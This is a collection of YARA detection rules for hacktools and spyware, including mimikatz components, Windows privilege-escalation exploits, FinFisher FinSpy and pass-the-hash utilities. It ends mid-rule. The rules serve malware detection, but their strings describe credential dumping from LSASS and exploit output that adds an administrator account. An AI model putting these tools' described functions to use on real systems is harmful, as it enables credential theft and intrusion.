    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "5d578df9a71670aa832d1cd63379e6162564fb6b"
  strings:
    $s1 = "kappfree.dll" ascii fullword
    $s2 = "kappfree de mimikatz pour Windows (anti AppLocker)" wide fullword
    $s3 = "' introuvable !" wide fullword
    $s4 = "kiwi\\mimikatz" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 204800 and 2 of them
}

rule x_way2_5_sqlcmd {
  meta:
    description = "Chinese Hacktool Set - file sqlcmd.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "5152a57e3638418b0d97a42db1c0fc2f893a2794"
  strings:
    $s1 = "LOADER ERROR" ascii fullword
    $s2 = "The procedure entry point %s could not be located in the dynamic link library %s" ascii fullword
    $s3 = "The ordinal %u could not be located in the dynamic link library %s" ascii fullword
    $s4 = "kernel32.dll" ascii fullword
    $s5 = "VirtualAlloc" ascii fullword
    $s6 = "VirtualFree" ascii fullword
    $s7 = "VirtualProtect" ascii fullword
    $s8 = "ExitProcess" ascii fullword
    $s9 = "user32.dll" ascii fullword
    $s16 = "MessageBoxA" ascii fullword
    $s10 = "wsprintfA" ascii fullword
    $s11 = "kernel32.dll" ascii fullword
    $s12 = "GetProcAddress" ascii fullword
    $s13 = "GetModuleHandleA" ascii fullword
    $s14 = "LoadLibraryA" ascii fullword
    $s15 = "odbc32.dll" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 23552 and filesize > 20480 and all of them
}

rule Win32_klock {
  meta:
    description = "Chinese Hacktool Set - file klock.dll"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "7addce4434670927c4efaa560524680ba2871d17"
  strings:
    $s1 = "klock.dll" ascii fullword
    $s2 = "Erreur : impossible de basculer le bureau ; SwitchDesktop : " wide fullword
    $s3 = "klock de mimikatz pour Windows" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 256000 and all of them
}

rule ipsearcher {
  meta:
    description = "Chinese Hacktool Set - file ipsearcher.dll"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "1e96e9c5c56fcbea94d26ce0b3f1548b224a4791"
  strings:
    $s0 = "http://www.wzpg.com" ascii fullword
    $s1 = "ipsearcher\\ipsearcher\\Release\\ipsearcher.pdb" ascii fullword
    $s3 = "_GetAddress" ascii fullword
    $s5 = "ipsearcher.dll" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 143360 and all of them
}

rule ms10048_x64 {
  meta:
    description = "Chinese Hacktool Set - file ms10048-x64.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "418bec3493c85e3490e400ecaff5a7760c17a0d0"
  strings:
    $s1 = "The target is most likely patched." ascii fullword
    $s2 = "Dojibiron by Ronald Huizer, (c) master#h4cker.us  " ascii fullword
    $s3 = "[ ] Creating evil window" ascii fullword
    $s4 = "[+] Set to %d exploit half succeeded" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 40960 and 1 of them
}

rule hscangui {
  meta:
    description = "Chinese Hacktool Set - file hscangui.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "af8aced0a78e1181f4c307c78402481a589f8d07"
  strings:
    $s1 = "[%s]: Found \"FTP account: anyone/anyone@any.net\"  !!!" ascii fullword
    $s2 = "http://www.cnhonker.com" ascii fullword
    $s3 = "%s@ftpscan#Cracked account:  %s/%s" ascii fullword
    $s4 = "[%s]: Found \"FTP account: %s/%s\" !!!" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 225280 and 2 of them
}

rule GoodToolset_ms11080 {
  meta:
    description = "Chinese Hacktool Set - file ms11080.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "f0854c49eddf807f3a7381d3b20f9af4a3024e9f"
  strings:
    $s1 = "[*] command add user 90sec 90sec" ascii fullword
    $s2 = "\\ms11080\\Debug\\ms11080.pdb" ascii fullword
    $s3 = "[>] by:Mer4en7y@90sec.org" ascii fullword
    $s4 = "[*] Add to Administrators success" ascii fullword
    $s5 = "[*] User has been successfully added" ascii fullword
    $s6 = "[>] ms11-08 Exploit" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 245760 and 2 of them
}

rule epathobj_exp64 {
  meta:
    description = "Chinese Hacktool Set - file epathobj_exp64.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "09195ba4e25ccce35c188657957c0f2c6a61d083"
  strings:
    $s1 = "Watchdog thread %d waiting on Mutex" ascii fullword
    $s2 = "Exploit ok run command" ascii fullword
    $s3 = "\\epathobj_exp\\x64\\Release\\epathobj_exp.pdb" ascii fullword
    $s4 = "Alllocated userspace PATHRECORD () %p" ascii fullword
    $s5 = "Mutex object did not timeout, list not patched" ascii fullword
    $s6 = "- inconsistent onexit begin-end variables" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 153600 and 2 of them
}

rule kelloworld_2 {
  meta:
    description = "Chinese Hacktool Set - file kelloworld.dll"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "55d5dabd96c44d16e41f70f0357cba1dda26c24f"
  strings:
    $s1 = "Hello World!" wide fullword
    $s2 = "kelloworld.dll" ascii fullword
    $s3 = "kelloworld de mimikatz pour Windows" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 204800 and all of them
}

rule HScan_v1_20_hscan {
  meta:
    description = "Chinese Hacktool Set - file hscan.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    hash = "568b06696ea0270ee1a744a5ac16418c8dacde1c"
  strings:
    $s1 = "[%s]: Found \"FTP account: anyone/anyone@any.net\"  !!!" ascii fullword
    $s2 = "%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,100" ascii fullword
    $s3 = ".\\report\\%s-%s.html" ascii fullword
    $s4 = ".\\log\\Hscan.log" ascii fullword
    $s5 = "[%s]: Found cisco Enable password: %s !!!" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 204800 and 2 of them
}

rule _Project1_Generate_rejoice {
  meta:
    description = "Chinese Hacktool Set - from files Project1.exe, Generate.exe, rejoice.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    super_rule = 1
    hash0 = "d1a5e3b646a16a7fcccf03759bd0f96480111c96"
    hash1 = "2cb4c3916271868c30c7b4598da697f59e9c7a12"
    hash2 = "fe634a9f5d48d5c64c8f8bfd59ac7d8965d8f372"
  strings:
    $s1 = "sfUserAppDataRoaming" ascii fullword
    $s2 = "$TRzFrameControllerPropertyConnection" ascii fullword
    $s3 = "delphi32.exe" ascii fullword
    $s4 = "hkeyCurrentUser" ascii fullword
    $s5 = "%s is not a valid IP address." wide fullword
    $s6 = "Citadel hooking error" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 2048000 and all of them
}

rule _hscan_hscan_hscangui {
  meta:
    description = "Chinese Hacktool Set - from files hscan.exe, hscan.exe, hscangui.exe"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    super_rule = 1
    hash0 = "17a743e40790985ececf5c66eaad2a1f8c4cffe8"
    hash1 = "568b06696ea0270ee1a744a5ac16418c8dacde1c"
    hash2 = "af8aced0a78e1181f4c307c78402481a589f8d07"
  strings:
    $s1 = ".\\log\\Hscan.log" ascii fullword
    $s2 = ".\\report\\%s-%s.html" ascii fullword
    $s3 = "[%s]: checking \"FTP account: ftp/ftp@ftp.net\" ..." ascii fullword
    $s4 = "[%s]: IPC NULL session connection success !!!" ascii fullword
    $s5 = "Scan %d targets,use %4.1f minutes" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 245760 and all of them
}

rule kiwi_tools {
  meta:
    description = "Chinese Hacktool Set - from files kappfree.dll, kelloworld.dll, KiwiCmd.exe, KiwiRegedit.exe, KiwiTaskmgr.exe, klock.dll, mimikatz.exe, mimikatz.sys, sekurlsa.dll, kappfree.dll, kelloworld.dll, KiwiCmd.exe, KiwiRegedit.exe, KiwiTaskmgr.exe, klock.dll, mimikatz.exe, mimikatz.sys, sekurlsa.dll"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    super_rule = 1
    hash0 = "e57e79f190f8a24ca911e6c7e008743480c08553"
    hash1 = "55d5dabd96c44d16e41f70f0357cba1dda26c24f"
    hash2 = "7ac7541e20af7755b7d8141c5c1b7432465cabd8"
    hash3 = "9fbfe3eb49d67347ab57ae743f7542864bc06de6"
    hash4 = "5c90d648c414bdafb549291f95fe6f27c0c9b5ec"
    hash5 = "7addce4434670927c4efaa560524680ba2871d17"
    hash6 = "28c5c0bdb7786dc2771672a2c275be7d9b742ec7"
    hash7 = "b5c93489a1b62181594d0fb08cc510d947353bc8"
    hash8 = "6acecd18fc7da1c5eb0d04e848aae9ce59d2b1b5"
    hash9 = "5d578df9a71670aa832d1cd63379e6162564fb6b"
    hash10 = "febadc01a64a071816eac61a85418711debaf233"
    hash11 = "569ca4ff1a5ea537aefac4a04a2c588c566c6d86"
    hash12 = "56a61c808b311e2225849d195bbeb69733efe49a"
    hash13 = "8bd6c9f2e8be3e74bd83c6a2d929f8a69422fb16"
    hash14 = "44825e848bc3abdb6f31d0a49725bb6f498e9ccc"
    hash15 = "f661d6516d081c37ab7da0f4ec21b2cc6a9257c6"
    hash16 = "20facf1fa2d87cccf177403ca1a7852128a9a0ab"
    hash17 = "6e0ffa472d63fdda5abc4c1b164ba8724dcb25b5"
  strings:
    $s1 = "http://blog.gentilkiwi.com/mimikatz" ascii
    $s2 = "Benjamin Delpy" ascii fullword
    $s3 = "GlobalSign" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 1024000 and all of them
}

rule kiwi_tools_gentil_kiwi {
  meta:
    description = "Chinese Hacktool Set - from files kappfree.dll, kelloworld.dll, KiwiCmd.exe, KiwiRegedit.exe, KiwiTaskmgr.exe, klock.dll, mimikatz.exe, sekurlsa.dll, kappfree.dll, kelloworld.dll, KiwiCmd.exe, KiwiRegedit.exe, KiwiTaskmgr.exe, klock.dll, mimikatz.exe, sekurlsa.dll"
    author = "Florian Roth"
    reference = "http://tools.zjqhr.com/"
    date = "2015-06-13"
    super_rule = 1
    hash0 = "e57e79f190f8a24ca911e6c7e008743480c08553"
    hash1 = "55d5dabd96c44d16e41f70f0357cba1dda26c24f"
    hash2 = "7ac7541e20af7755b7d8141c5c1b7432465cabd8"
    hash3 = "9fbfe3eb49d67347ab57ae743f7542864bc06de6"
    hash4 = "5c90d648c414bdafb549291f95fe6f27c0c9b5ec"
    hash5 = "7addce4434670927c4efaa560524680ba2871d17"
    hash6 = "28c5c0bdb7786dc2771672a2c275be7d9b742ec7"
    hash7 = "6acecd18fc7da1c5eb0d04e848aae9ce59d2b1b5"
    hash8 = "5d578df9a71670aa832d1cd63379e6162564fb6b"
    hash9 = "febadc01a64a071816eac61a85418711debaf233"
    hash10 = "569ca4ff1a5ea537aefac4a04a2c588c566c6d86"
    hash11 = "56a61c808b311e2225849d195bbeb69733efe49a"
    hash12 = "8bd6c9f2e8be3e74bd83c6a2d929f8a69422fb16"
    hash13 = "44825e848bc3abdb6f31d0a49725bb6f498e9ccc"
    hash14 = "f661d6516d081c37ab7da0f4ec21b2cc6a9257c6"
    hash15 = "6e0ffa472d63fdda5abc4c1b164ba8724dcb25b5"
  strings:
    $s1 = "mimikatz" wide fullword
    $s2 = "Copyright (C) 2012 Gentil Kiwi" wide fullword
    $s3 = "Gentil Kiwi" wide fullword
  condition:
    uint16(0) == 23117 and filesize < 1024000 and all of them
}

rule dubrute : bruteforcer toolkit {
  meta:
    author = "Christian Rebischke (@sh1bumi)"
    date = "2015-09-05"
    description = "Rules for DuBrute Bruteforcer"
    in_the_wild = true
    family = "Hackingtool/Bruteforcer"
  strings:
    $a = "WBrute"
    $b = "error.txt"
    $c = "good.txt"
    $d = "source.txt"
    $e = "bad.txt"
    $f = "Generator IP@Login;Password"
  condition:
    uint16(0) == 23117 and $a and $b and $c and $d and $e and $f
}

rule FinSpy_2 {
  meta:
    description = "FinFisher FinSpy"
    author = "botherder https://github.com/botherder"
  strings:
    $password1 = /\/scomma kbd101\.sys/ ascii wide
    $password2 = /(N)AME,EMAIL CLIENT,EMAIL ADDRESS,SERVER NAME,SERVER TYPE,USERNAME,PASSWORD,PROFILE/ ascii wide
    $password3 = /\/scomma excel2010\.part/ ascii wide
    $password4 = /(A)PPLICATION,PROTOCOL,USERNAME,PASSWORD/ ascii wide
    $password5 = /\/stab MSVCR32\.manifest/ ascii wide
    $password6 = /\/scomma MSN2010\.dll/ ascii wide
    $password7 = /\/scomma Firefox\.base/ ascii wide
    $password8 = /(I)NDEX,URL,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD,FILE,HTTP/ ascii wide
    $password9 = /\/scomma IE7setup\.sys/ ascii wide
    $password10 = /(O)RIGIN URL,ACTION URL,USERNAME FIELD,PASSWORD FIELD,USERNAME,PASSWORD,TIMESTAMP/ ascii wide
    $password11 = /\/scomma office2007\.cab/ ascii wide
    $password12 = /(U)RL,PASSWORD TYPE,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD/ ascii wide
    $password13 = /\/scomma outlook2007\.dll/ ascii wide
    $password14 = /(F)ILENAME,ENCRYPTION,VERSION,CRC,PASSWORD 1,PASSWORD 2,PASSWORD 3,PATH,SIZE,LAST MODIFICATION DATE,ERROR/ ascii wide
    $screenrec1 = /(s)111o00000000\.dat/ ascii wide
    $screenrec2 = /(t)111o00000000\.dat/ ascii wide
    $screenrec3 = /(f)113o00000000\.dat/ ascii wide
    $screenrec4 = /(w)114o00000000\.dat/ ascii wide
    $screenrec5 = /(u)112Q00000000\.dat/ ascii wide
    $screenrec6 = /(v)112Q00000000\.dat/ ascii wide
    $screenrec7 = /(v)112O00000000\.dat/ ascii wide
    $micrec = /2101[0-9A-F]{8}\.dat/ ascii wide
    $skyperec1 = /\[%19s\] %25s\:    %s/ ascii wide
    $skyperec2 = /Global\\\{A48F1A32\-A340\-11D0\-BC6B\-00A0C903%\.04X\}/ wide
    $skyperec3 = /(1411|1421|1431|1451)[0-9A-F]{8}\.dat/ ascii wide
    $mouserec1 = /(m)sc183Q000\.dat/ ascii wide
    $mouserec2 = /2201[0-9A-F]{8}\.dat/ ascii wide
    $driver = /\\\\\\\\\.\\\\driverw/ ascii wide
    $janedow1 = /(J)ane Dow\'s x32 machine/ ascii wide
    $janedow2 = /(J)ane Dow\'s x64 machine/ ascii wide
    $versions1 = /(f)inspyv2/ nocase
    $versions2 = /(f)inspyv4/ nocase
    $bootkit1 = /(b)ootkit_x32driver/
    $bootkit2 = /(b)ootkit_x64driver/
    $typo1 = /(S)creenShort Recording/ wide
    $mssounddx = /(S)ystem\\CurrentControlSet\\Services\\mssounddx/ wide
  condition:
    8 of ($password*) or any of ($screenrec*) or $micrec or any of ($skyperec*) or any of ($mouserec*) or $driver or any of ($janedow*) or any of ($versions*) or any of ($bootkit*) or $typo1 or $mssounddx
}

rule FinSpy {
  meta:
    description = "FinFisher FinSpy"
    author = "AlienVault Labs"
  strings:
    $filter1 = "$password14"
    $filter2 = "$screenrec7"
    $filter3 = "$micrec"
    $filter4 = "$skyperec3"
    $filter5 = "$mouserec2"
    $filter6 = "$driver"
    $filter7 = "$janedow2"
    $filter8 = "$bootkit2"
    $password1 = /\/scomma kbd101\.sys/ ascii wide
    $password2 = /(N)AME,EMAIL CLIENT,EMAIL ADDRESS,SERVER NAME,SERVER TYPE,USERNAME,PASSWORD,PROFILE/ ascii wide
    $password3 = /\/scomma excel2010\.part/ ascii wide
    $password4 = /(A)PPLICATION,PROTOCOL,USERNAME,PASSWORD/ ascii wide
    $password5 = /\/stab MSVCR32\.manifest/ ascii wide
    $password6 = /\/scomma MSN2010\.dll/ ascii wide
    $password7 = /\/scomma Firefox\.base/ ascii wide
    $password8 = /(I)NDEX,URL,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD,FILE,HTTP/ ascii wide
    $password9 = /\/scomma IE7setup\.sys/ ascii wide
    $password10 = /(O)RIGIN URL,ACTION URL,USERNAME FIELD,PASSWORD FIELD,USERNAME,PASSWORD,TIMESTAMP/ ascii wide
    $password11 = /\/scomma office2007\.cab/ ascii wide
    $password12 = /(U)RL,PASSWORD TYPE,USERNAME,PASSWORD,USERNAME FIELD,PASSWORD FIELD/ ascii wide
    $password13 = /\/scomma outlook2007\.dll/ ascii wide
    $password14 = /(F)ILENAME,ENCRYPTION,VERSION,CRC,PASSWORD 1,PASSWORD 2,PASSWORD 3,PATH,SIZE,LAST MODIFICATION DATE,ERROR/ ascii wide
    $screenrec1 = /(s)111o00000000\.dat/ ascii wide
    $screenrec2 = /(t)111o00000000\.dat/ ascii wide
    $screenrec3 = /(f)113o00000000\.dat/ ascii wide
    $screenrec4 = /(w)114o00000000\.dat/ ascii wide
    $screenrec5 = /(u)112Q00000000\.dat/ ascii wide
    $screenrec6 = /(v)112Q00000000\.dat/ ascii wide
    $screenrec7 = /(v)112O00000000\.dat/ ascii wide
    $micrec = /2101[0-9A-F]{8}\.dat/ ascii wide
    $skyperec1 = /\[%19s\] %25s\:    %s/ ascii wide
    $skyperec2 = /Global\\\{A48F1A32\-A340\-11D0\-BC6B\-00A0C903%\.04X\}/ wide
    $driver = /\\\\\\\\\.\\\\driverw/ ascii wide
    $janedow1 = /(J)ane Dow\'s x32 machine/ ascii wide
    $janedow2 = /(J)ane Dow\'s x64 machine/ ascii wide
    $bootkit1 = /(b)ootkit_x32driver/
    $bootkit2 = /(b)ootkit_x64driver/
    $typo1 = /(S)creenShort Recording/ wide
    $mssounddx = /(S)ystem\\CurrentControlSet\\Services\\mssounddx/ wide
  condition:
    (8 of ($password*) or any of ($screenrec*) or $micrec or any of ($skyperec*) or $driver or any of ($janedow*) or any of ($bootkit*) or $typo1 or $mssounddx) and not any of ($filter*)
}

rule Powerkatz_DLL_Generic {
  meta:
    description = "Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible)"
    author = "Florian Roth"
    reference = "PowerKatz Analysis"
    date = "2016-02-05"
    super_rule = 1
    score = 80
    hash1 = "c20f30326fcebad25446cf2e267c341ac34664efad5c50ff07f0738ae2390eae"
    hash2 = "1e67476281c1ec1cf40e17d7fc28a3ab3250b474ef41cb10a72130990f0be6a0"
    hash3 = "49e7bac7e0db87bf3f0185e9cf51f2539dbc11384fefced465230c4e5bce0872"
  strings:
    $s1 = "%3u - Directory '%s' (*.kirbi)" wide fullword
    $s2 = "%*s  pPublicKey         : " wide fullword
    $s3 = "ad_hoc_network_formed" wide fullword
    $s4 = "<3 eo.oe ~ ANSSI E>" wide fullword
    $s5 = "\\*.kirbi" wide fullword
    $c1 = "kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x%08x)" wide fullword
    $c2 = "kuhl_m_lsadump_getComputerAndSyskey ; kuhl_m_lsadump_getSyskey KO" wide fullword
  condition:
    (uint16(0) == 23117 and filesize < 1024000 and 1 of them) or 2 of them
}

private rule is__str_mandibule_gen1 {
  meta:
    author = "unixfreaxjp"
    date = "2018-05-31"
  strings:
    $str01 = "shared arguments too big" ascii wide nocase fullword
    $str02 = "self inject pid: %" ascii wide nocase fullword
    $str03 = "injected shellcode at 0x%lx" ascii wide nocase fullword
    $str04 = "target pid: %d" ascii wide nocase fullword
    $str05 = "mapping '%s' into memory at 0x%lx" ascii wide nocase fullword
    $str06 = "shellcode injection addr: 0x%lx" ascii wide nocase fullword
    $str07 = "loading elf at: 0x%llx" ascii wide nocase fullword
  condition:
    4 of them
}

private rule is__hex_top_mandibule64 {
  meta:
    author = "unixfreaxjp"
    date = "2018-05-31"
  strings:
    $hex01 = { 48 8D 05 43 01 00 00 48 89 E7 FF D0 }
    $hex02 = { 53 48 83 EC 50 48 89 7C 24 08 48 8B 44 24 08 }
    $hex03 = { 48 81 EC 18 02 00 00 89 7C 24 1C 48 89 74 }
    $hex04 = { 53 48 81 EC 70 01 01 00 48 89 7C 24 08 48 8D 44 24 20 48 05 00 00 }
  condition:
    3 of them
}

private rule is__hex_mid_mandibule32 {
  meta:
    author = "unixfreaxjp"
    date = "2018-06-01"
  strings:
    $hex05 = { E8 09 07 00 00 81 C1 FC 1F 00 00 8D 81 26 E1 FF FF }
    $hex06 = { 56 53 83 EC 24 E8 E1 05 00 00 81 C3 D0 1E 00 00 8B 44 24 30 }
    $hex07 = { 81 C3 E8 29 00 00 C7 44 24 0C }
    $hex08 = { E8 C6 D5 FF FF 83 C4 0C 68 00 01 00 00 }
  condition:
    3 of them
}

rule TOOLKIT_Mandibule {
  meta:
    description = "Generic detection for ELF Linux process injector mandibule generic"
    reference = "https://imgur.com/a/MuHSZtC"
    author = "unixfreaxjp"
    org = "MalwareMustDie"
    date = "2018-06-01"
  condition:
    ((is__str_mandibule_gen1) or (is__hex_mid_mandibule32)) or ((is__str_mandibule_gen1) or (is__hex_top_mandibule64)) and is__elf and filesize < 30720
}

rule whosthere_alt : Toolkit {
  meta:
    description = "Auto-generated rule - file whosthere-alt.exe"
    author = "Florian Roth"
    reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
    date = "2015-07-10"
    score = 80
    hash = "9b4c3691872ca5adf6d312b04190c6e14dd9cbe10e94c0dd3ee874f82db897de"
  strings:
    $s0 = "WHOSTHERE-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" ascii fullword
    $s1 = "whosthere enters an infinite loop and searches for new logon sessions every 2 seconds. Only new sessions are shown if found." ascii fullword
    $s2 = "dump output to a file, -o filename" ascii fullword
    $s3 = "This tool lists the active LSA logon sessions with NTLM credentials." ascii fullword
    $s4 = "Error: pth.dll is not in the current directory!." ascii fullword
    $s5 = "the output format is: username:domain:lmhash:nthash" ascii fullword
    $s6 = ".\\pth.dll" ascii fullword
    $s7 = "Cannot get LSASS.EXE PID!" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 286720 and 2 of them
}

rule iam_alt_iam_alt : Toolkit {
  meta:
    description = "Auto-generated rule - file iam-alt.exe"
    author = "Florian Roth"
    reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
    date = "2015-07-10"
    score = 80
    hash = "2ea662ef58142d9e340553ce50d95c1b7a405672acdfd476403a565bdd0cfb90"
  strings:
    $s0 = "<cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)" ascii fullword
    $s1 = "IAM-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" ascii fullword
    $s2 = "This tool allows you to change the NTLM credentials of the current logon session" ascii fullword
    $s3 = "username:domainname:lmhash:nthash" ascii fullword
    $s4 = "Error in cmdline!. Bye!." ascii fullword
    $s5 = "Error: Cannot open LSASS.EXE!." ascii fullword
    $s6 = "nthash is too long!." ascii fullword
    $s7 = "LSASS HANDLE: %x" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 245760 and 2 of them
}

rule genhash_genhash : Toolkit {
  meta:
    description = "Auto-generated rule - file genhash.exe"
    author = "Florian Roth"
    reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
    date = "2015-07-10"
    score = 80
    hash = "113df11063f8634f0d2a28e0b0e3c2b1f952ef95bad217fd46abff189be5373f"
  strings:
    $s1 = "genhash.exe <password>" ascii fullword
    $s3 = "Password: %s" ascii fullword
    $s4 = "%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X%.2X" ascii fullword
    $s5 = "This tool generates LM and NT hashes." ascii fullword
    $s6 = "(hashes format: LM Hash:NT hash)" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 204800 and 2 of them
}

rule iam_iamdll : Toolkit {
  meta:
    description = "Auto-generated rule - file iamdll.dll"
    author = "Florian Roth"
    reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
    date = "2015-07-10"
    score = 80
    hash = "892de92f71941f7b9e550de00a57767beb7abe1171562e29428b84988cee6602"
  strings:
    $s0 = "LSASRV.DLL" ascii fullword
    $s1 = "iamdll.dll" ascii fullword
    $s2 = "ChangeCreds" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 117760 and all of them
}

rule iam_iam : Toolkit {
  meta:
    description = "Auto-generated rule - file iam.exe"
    author = "Florian Roth"
    reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
    date = "2015-07-10"
    score = 80
    hash = "8a8fcce649259f1b670bb1d996f0d06f6649baa8eed60db79b2c16ad22d14231"
  strings:
    $s1 = "<cmd>. Create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)" ascii fullword
    $s2 = "iam.exe -h administrator:mydomain:" ascii
    $s3 = "An error was encountered when trying to change the current logon credentials!." ascii fullword
    $s4 = "optional parameter. If iam.exe crashes or doesn't work when run in your system, use this parameter." ascii fullword
    $s5 = "IAM.EXE will try to locate some memory locations instead of using hard-coded values." ascii fullword
    $s6 = "Error in cmdline!. Bye!." ascii fullword
    $s7 = "Checking LSASRV.DLL...." ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 307200 and all of them
}

rule whosthere_alt_pth : Toolkit {
  meta:
    description = "Auto-generated rule - file pth.dll"
    author = "Florian Roth"
    reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
    date = "2015-07-10"
    score = 80
    hash = "fbfc8e1bc69348721f06e96ff76ae92f3551f33ed3868808efdb670430ae8bd0"
  strings:
    $s0 = "c:\\debug.txt" ascii fullword
    $s1 = "pth.dll" ascii fullword
    $s2 = "\"Primary\" string found at %.8Xh" ascii fullword
    $s3 = "\"Primary\" string not found!" ascii fullword
    $s4 = "segment 1 found at %.8Xh" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 245760 and 4 of them
}

rule whosthere : Toolkit {
  meta:
    description = "Auto-generated rule - file whosthere.exe"
    author = "Florian Roth"
    reference = "http://www.coresecurity.com/corelabs-research/open-source-tools/pass-hash-toolkit"
    date = "2015-07-10"
    score = 80
    hash = "d7a82204d3e511cf5af58eabdd6e9757c5dd243f9aca3999dc0e5d1603b1fa37"
  strings:
    $s1 = "by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies" ascii fullword
    $s2 = "whosthere enters an infinite loop and searches for new logon sessions every 2 seconds. Only new sessions are shown if found." ascii fullword
    $s3 = "specify addresses to use. Format: ADDCREDENTIAL_ADDR:ENCRYPTMEMORY_ADDR:FEEDBACK_ADDR:DESKEY_ADDR:LOGONSESSIONLIST_ADDR:LOGONSES" ascii
    $s4 = "Could not enable debug privileges. You must run this tool with an account with administrator privileges." ascii fullword
    $s5 = "-B is now used by default. Trying to find correct addresses.." ascii fullword
    $s6 = "Cannot get LSASS.EXE PID!" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 327680 and 2 of them
}

rule Powerstager {
  meta:
    author = "Jeff White - jwhite@paloaltonetworks.com @noottrak"
    date = "02JAN2018"
    hash1 = "758097319d61e2744fb6b297f0bff957c6aab299278c1f56a90fba197795a0fa"
    hash2 = "83e714e72d9f3c500cad610c4772eae6152a232965191f0125c1c6f97004b7b5"
    description = "Detects PowerStager Windows executable, both x86 and x64"
    reference = "https://researchcenter.paloaltonetworks.com/2018/01/unit42-powerstager-analysis/"
    reference2 = "https://github.com/z0noxz/powerstager"
  strings:
    $filename = /%s\\[a-zA-Z0-9]{12}/
    $pathname = "TEMP" ascii wide
    $filedesc = "Lorem ipsum dolor sit amet, consecteteur adipiscing elit" ascii wide
    $apicall_01 = "memset"
    $apicall_02 = "getenv"
    $apicall_03 = "fopen"
    $apicall_04 = "memcpy"
    $apicall_05 = "fwrite"
    $apicall_06 = "fclose"
    $apicall_07 = "CreateProcessA"
    $decoder_x86_01 = { 8D 95 [4] 8B 45 ?? 01 D0 0F B6 18 8B 4D ?? }
    $decoder_x86_02 = { 89 C8 0F B6 84 05 [4] 31 C3 89 D9 8D 95 [4] 8B 45 ?? 01 D0 88 08 83 45 [2] 8B 45 ?? 3D }
    $decoder_x64_01 = { 8B 85 [4] 48 98 44 0F [7] 8B 85 [4] 48 63 C8 48 }
    $decoder_x64_02 = { 48 89 ?? 0F B6 [3-6] 44 89 C2 31 C2 8B 85 [4] 48 98 }
  condition:
    uint16be(0) == 19802 and all of ($apicall_*) and $filename and $pathname and $filedesc and (2 of ($decoder_x86*) or 2 of ($decoder_x64*))
}

rule QuarksPwDump_Gen : Toolkit {
  meta:
    description = "Detects all QuarksPWDump versions"
    author = "Florian Roth"
    date = "2015-09-29"
    score = 80
    hash1 = "2b86e6aea37c324ce686bd2b49cf5b871d90f51cec24476daa01dd69543b54fa"
    hash2 = "87e4c76cd194568e65287f894b4afcef26d498386de181f568879dde124ff48f"
    hash3 = "a59be92bf4cce04335bd1a1fcf08c1a94d5820b80c068b3efe13e2ca83d857c9"
    hash4 = "c5cbb06caa5067fdf916e2f56572435dd40439d8e8554d3354b44f0fd45814ab"
    hash5 = "677c06db064ee8d8777a56a641f773266a4d8e0e48fbf0331da696bea16df6aa"
    hash6 = "d3a1eb1f47588e953b9759a76dfa3f07a3b95fab8d8aa59000fd98251d499674"
